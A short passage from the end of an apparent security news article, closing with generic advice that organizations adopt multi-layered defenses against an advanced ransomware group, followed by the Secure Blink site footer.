makes the group particularly dangerous. Organizations must remain vigilant, adopt **multi-layered defenses**, and strengthen their response capabilities to effectively mitigate the risks posed by such advanced ransomware campaigns.

loading..   19-Nov-2024
loading..   1 min read
Company Logo
logo

Secure Blink automates the web application and API security for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

LinkedIn Logo
Twitter Logo
Discord Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

contact@secureblink.com

@ Copyright 2025 Secure Blink. All rights reserved.

16192, Coastal Highway, Lewes, Delaware, US-19958